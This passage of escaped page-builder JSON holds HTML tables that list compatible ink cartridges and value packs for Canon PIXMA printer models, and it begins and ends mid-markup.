width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-755XXL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MG2570S<\\/p><\\/td><td width=\\\"208\\\"><p>CL-746 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-746S (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-746XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745S (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MG2577S<\\/p><\\/td><td width=\\\"208\\\"><p>CL-746 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-746S (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-746XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745S (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745XL (Pigment Black)<\\/p><\\/td><\\/tr><\\/tbody><\\/table>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ac4d506\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"2645364\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"62e0d92\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<table width=\\\"378\\\"><tbody><tr><td width=\\\"170\\\"><p><strong>Model<\\/strong><\\/p><\\/td><td width=\\\"208\\\"><p><strong>Cartridge \\/ Bottle<\\/strong><\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MG3570<\\/p><\\/td><td width=\\\"208\\\"><p>CL-741 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-741XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-740 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-740\\/CL-741 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-740XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MG3670<\\/p><\\/td><td width=\\\"208\\\"><p>CL-741 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-741XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-740 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-740\\/CL-741 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-740XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MG7570<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-751 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP160<\\/p><\\/td><td width=\\\"208\\\"><p>CL-41 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40\\/CL-41 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP170<\\/p><\\/td><td width=\\\"208\\\"><p>CL-41 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40\\/CL-41 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP180<\\/p><\\/td><td width=\\\"208\\\"><p>CL-41 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40\\/CL-41 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP228<\\/p><\\/td><td width=\\\"208\\\"><p>CL-41 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-831 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40\\/CL-41 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-830 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP237<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP245<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP258<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP276<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><\\/tbody><\\/table>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2be4aef\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d0f60c7\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<table width=\\\"378\\\"><tbody><tr><td width=\\\"170\\\"><p><strong>Model<\\/strong><\\/p><\\/td><td width=\\\"208\\\"><p><strong>Cartridge \\/ Bottle<\\/strong><\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP287<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP460<\\/p><\\/td><td width=\\\"208\\\"><p>CL-41 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40\\/CL-41 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP476<\\/p><\\/td><td width=\\\"208\\\"><p>CL-41 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-831 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40\\/CL-41 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-830 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP486<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP496<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP497<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP500<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-8 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-5 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP520<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-8 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-5 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP530<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-8 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-5 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP568<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-821 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-820 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP600<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-8 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-5 (Pigment Black)<\\/p><\\/td><\\/tr><\\/tbody><\\/table>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b289177\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b0d2e40\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<table width=\\\"378\\\"><tbody><tr><td width=\\\"170\\\"><p><strong>Model<\\/strong><\\/p><\\/td><td width=\\\"208\\\"><p><strong>Cartridge \\/ Bottle<\\/strong><\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP610<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-8 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-5 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP628<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-821 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-820 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP638<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-821 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-820 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP648<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-821 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-820 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP800<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-8 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-5 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP800R<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-8 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-5 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP810<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-8 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-5 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP830<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-8 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-5 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP970<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-8 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Photo Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Photo Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-5 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP988<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-821 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-820 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP996<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-821 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-820 (Pigment Black)<\\/p><\\/td><\\/tr><\\/tbody><\\/table>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9d0130d\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"fc01984\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6549880\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<table width=\\\"378\\\"><tbody><tr><td width=\\\"170\\\"><p><strong>Model<\\/strong><\\/p><\\/td><td width=\\\"208\\\"><p><strong>Cartridge \\/ Bottle<\\/strong><\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MX308<\\/p><\\/td><td width=\\\"208\\\"><p>CL-41 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-831 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td 